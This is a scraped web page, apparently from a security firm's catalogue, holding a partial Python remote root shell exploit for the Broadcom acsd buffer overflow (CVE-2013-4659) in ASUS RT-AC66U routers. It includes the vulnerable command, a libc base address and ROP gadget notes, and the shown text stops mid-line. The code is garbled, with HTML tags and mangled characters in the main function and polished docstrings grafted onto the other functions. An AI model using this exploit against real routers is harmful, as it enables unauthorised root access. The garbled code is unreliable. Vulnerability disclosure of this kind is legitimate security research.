ISE SOHO Vulnerability Catalog Published - Independent Security ...
# The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
# Buffer Overflow attacks.
#
# Multiple overflows exist in the following software:
#
# - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)
#
def sigHandle(signum, frm):  # Signal handler
    """Handle SIGINT (ctrl + c): announce cleanup, pause briefly, then exit 0.

    Args:
        signum: signal number delivered by the runtime (unused).
        frm: stack frame current at delivery time (unused).

    Raises:
        SystemExit: always, via exit(0).
    """
    banner = "\n[!!!] Cleaning up the exploit... [!!!]\n"
    print(banner)
    sleep(1)  # brief pause before the process ends
    exit(0)
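def targServer():
    """Prompt until the user supplies a valid IPv4 address and return it.

    The entered text is validated by round-tripping it through
    inet_aton/inet_ntoa, so any shorthand form inet_aton accepts comes back
    in normalised dotted-quad form.

    Returns:
        str: the validated, normalised IPv4 address.

    Raises:
        EOFError: if stdin is closed before a valid address is entered. The
            original bare ``except:`` swallowed this (and the SystemExit
            raised by the SIGINT handler), trapping the user in the loop.
    """
    prompt = "\n[*] Please enter the IPv4 address of the ASUS RT-‐AC66U router:\n\n>"
    while True:
        entered = raw_input(prompt)
        try:
            packed = inet_aton(entered)
        except (IOError, OSError, ValueError):
            # Only address-format errors are retried: socket.error is an
            # IOError subclass on Python 2 and an OSError alias on Python 3.
            print("\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n")
            sleep(1)
            continue
        return inet_ntoa(packed)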
def main(): <br />
print ("""\n [*] Title: ASUS RT-‐AC66U Remote Root Shell Exploit -‐ acsd param command <br />
[*] Discovered and Reported: June 2013 <br />
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, <strong>Security</strong> Analysts @ <strong>ISE</strong> <br />
[*] Software Vendor: http://asus.com <br />
[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ <br />
[*] Software: acsd wireless service (Listens on TCP/5916) <br />
[*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) <br />
[*] CVE: ASUS RT-‐AC66U Broadcom ACSD Buffer Overflow: CVE-‐2013-‐4659\n""") <br />
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c <br />
victim = targServer() <br />
port = int(5916) <br />
acsdCmd = "autochannel¶m=" #Vulnerable command -‐ JH <br />
# base address of .text section of libc.so.0 in acsd's address space <br />
libc_base = 0x2ab25000 <br />
# ROP gadget #1 <br />
# lui s0,0x2 <br />
# li a0,1 <br />
# move t9,s1 <br />
# jalr t9 <br />
# ori a1,s0,0x2 <br />
ra1 = struct.pack("